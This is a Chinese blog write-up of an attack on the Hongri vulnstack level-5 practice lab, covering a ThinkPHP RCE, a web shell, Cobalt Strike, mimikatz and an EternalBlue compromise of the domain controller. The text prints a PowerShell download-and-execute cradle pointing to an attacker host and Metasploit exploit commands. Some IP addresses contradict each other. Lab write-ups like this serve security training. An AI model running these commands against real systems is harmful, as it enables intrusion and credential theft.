红日靶场第五关

红日靶场第五关

  • 可以查看我个人博客http://cllmsy.cn/与我交流,优快云只是为了方便发图。

一、环境配置

靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com
# win7 web需要打开C盘里的phpstudy,最好关一下防火墙

2008
sun\admin 2020.com
Win7双网卡模拟内外网

VMnet2网卡:192.168.25.0/24 外网
VMnet10网卡:192.168.26.0/24 内网

二、目标

一、环境搭建
    1.环境搭建测试
    2.信息收集
二、漏洞利用
    3.漏洞搜索与利用
    4.漏洞利用Getshell
    5.系统信息收集
    6.主机密码收集
三、内网搜集
    7.内网--继续信息收集
    8.内网攻击姿势--MS14-058
    9.内网攻击姿势--MS17-010
四、横向移动
    10.psexec远控
    11.内网其它主机端口
    12.netsh增删防火墙规则
五、构建通道
    13.内网其它主机端口-代理转发
六、持久控制
    14.域渗透-域成员信息收集
    15.域渗透-基础服务弱口令探测及深度利用之powershell
    16.域渗透-横向移动[wmi利用]
    17.域渗透-域控实现与利用
七、痕迹清理
    18、日志清理

三、WEB外网打点

3.1 资产收集

外网IP得到为192.168.25.128,开启了80端口。

在这里插入图片描述

3.2 Thinkphp getshell

在这里插入图片描述

3.2.1 tp5_invoke_func_code_exec_1漏洞

在这里插入图片描述

3.2.2 文件上传上线冰蝎

上传shell.php

在这里插入图片描述

getshell:

在这里插入图片描述

四、上线CS

4.1 木马后门上线

4.1.1 配置监听

开启CS

在这里插入图片描述

配置监听

在这里插入图片描述

攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行

4.1.2 上线CS成功

在这里插入图片描述

4.2 powershell上线

4.2.1 powershell命令执行

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.25.132:8899/a’))”

在这里插入图片描述

4.3 权限提升

MS16-135提权,插件随便选的。

在这里插入图片描述

五、内网信息收集

5.1 本机信息收集

5.1.1 判断存在域控

shell ipconfig /all

在这里插入图片描述

5.1.2 本机网卡IP

双网卡,外网为192.168.25.131 内网为192.138.26.134

在这里插入图片描述

5.1.3 查看其他域内主机信息

shell net view

在这里插入图片描述

5.1.4 判断是否存在多个域

shell net view /domain

在这里插入图片描述

5.2 ICMP内网探测

两台机子IP为:192.168.26.131 192.168.26.134(win7)

在这里插入图片描述

在这里插入图片描述

判断DC为192.168.26.131

5.3 端口扫描

在这里插入图片描述

5.4 SMB端口漏洞(永恒之蓝扫描)

在这里插入图片描述

5.5 mimikatz抓取

adiminitrator:

在这里插入图片描述

leo:

在这里插入图片描述

六、内网横向

6.1 psexec传递

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )

在这里插入图片描述

#因为DC不出网,所以psexec传递失败,需要关闭防火墙,或者放行端口,在进行psexec传递攻击,但是我尝试了多种方法,于是决定绕一绕。

6.2 联动MSF

6.2.1 CS上线MSF
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_https #要用https
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run

下图绕了一绕。

在这里插入图片描述

6.3 利用MS17-010永恒之蓝拿下DC

永恒之蓝配置:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

在这里插入图片描述

成功利用:(试了很多遍,这种方法有点玄学,后续会写另一种方法)

在这里插入图片描述

6.4 检测

在这里插入图片描述

七、总结

这次的靶场可能搭建有点问题,中间卡了几个点,一方面是psexec传递不知道为什么上线不了CS,于是通过了联动MSF,用永恒之蓝拿下了DC域控,在清除痕迹和黄票子还没做细节操作,后续会补上缺失的操作。
### 关于红日靶场的概述 红日靶场是由红日安全团队开发的一系列用于网络安全测试和渗透测试的学习平台。这些靶场旨在帮助学习者通过实际操作掌握网络攻击与防御的技术细节[^1]。 #### 红日靶场的功能特点 红日靶场提供了多个版本,例如 `vulnstack` 系列中的不同版本(如 vulnstack-7),每个版本都模拟了一个真实的网络环境,包含了多种常见的漏洞场景供用户实践。例如,在 `vulnstack-7` 中,可以通过访问其官网获取详细的漏洞描述和技术背景信息[^2]。 #### 域控制器的操作方法 在某些红日靶场环境中,可以利用命令行工具来查看域控制器的信息。例如,使用以下命令可以列出当前域下的所有域控制器: ```bash net group "domain controllers" /domain ``` 这一步对于了解目标网络结构非常重要,尤其是在涉及 Active Directory 的渗透测试中[^3]。 #### 远程连接到域控制器 一旦获得了域控制器的 IP 地址,就可以尝试通过远程桌面协议 (RDP) 登录到该服务器上。如果已知默认管理员账户及其密码,则可以直接登录并进一步探索内部资源。需要注意的是,在真实环境下不应未经授权执行此类操作;而在练习过程中为了简化流程可能会提供明文凭据,比如用户名为 `administrator`,密码为 `Admin12345`[^4]。 #### 存活主机探测技术 针对内网中存在的其他潜在可攻陷设备,Metasploit Framework 提供了几种有效的扫描模块来进行存活检测。以下是几个常用的辅助模块示例: - **UDP Sweep**: 使用 UDP 数据包批量发送请求以识别响应节点。 ```ruby use auxiliary/scanner/discovery/udp_sweep ``` - **NetBIOS Name Query Scanner**: 针对 Windows 平台上的 NetBIOS 协议实现服务名称解析功能。 ```ruby use auxiliary/scanner/netbios/nbname ``` 以上提到的方法均需谨慎对待,并仅限于合法授权范围内的实验用途[^5]。 ### 注意事项 尽管上述内容有助于理解如何开展基础性的信息安全评估活动,但在任何情况下都不应滥用所学技能去损害他人利益或违反法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值